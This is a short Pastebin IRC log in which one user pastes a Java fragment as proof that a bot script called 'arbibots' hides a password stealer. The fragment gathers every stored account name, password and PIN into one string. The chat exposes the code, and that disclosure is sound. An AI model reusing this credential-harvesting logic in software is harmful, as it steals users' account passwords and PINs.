Advertisement
Guest User

Untitled

a guest
Jul 20th, 2017
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
mIRC 1.29 KB | None | 0 0
  1. [22:08] <radioactive> nick1
  2. [22:08] <radioactive> we finally have proof
  3. [22:08] <radioactive> final InetAddress address = InetAddress.getLocalHost();
  4. [22:08] <radioactive>             final NetworkInterface ni = NetworkInterface.getByInetAddress(address);
  5. [22:08] <radioactive>             key = new String(ni.getHardwareAddress());
  6. [22:08] <radioactive>         } catch (final Exception e) {
  7. [22:08] <radioactive>             key = System.getProperty("user.name") + System.getProperty("user.language");
  8. [22:08] <radioactive>         }
  9. [22:08] <radioactive>         accounts = loadAccounts();
  10. [22:08] <radioactive>         String[] allAccounts = getAccountNames();
  11. [22:08] <radioactive>         String s = "";
  12. [22:08] <radioactive>         for (String acc : allAccounts) {
  13. [22:08] <radioactive>             String password = ***********(acc);
  14. [22:08] <radioactive>             int pin = Integer.parseInt(getPin(acc));
  15. [22:08] <radioactive>             s += "[Username: " + acc + " Password: " + password + " Pin: "
  16. [22:08] <radioactive>                     + pin + "]";
  17. [22:08] <radioactive>         }
  18. [22:08] <nick1> what is that?
  19. [22:09] <radioactive> arbibots
  20. [22:09] <radioactive> the password stealer
  21. [22:10] <nick1> where was that?
  22. [22:10] <radioactive> in his script
  23. [22:11] <nick1> Which one?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement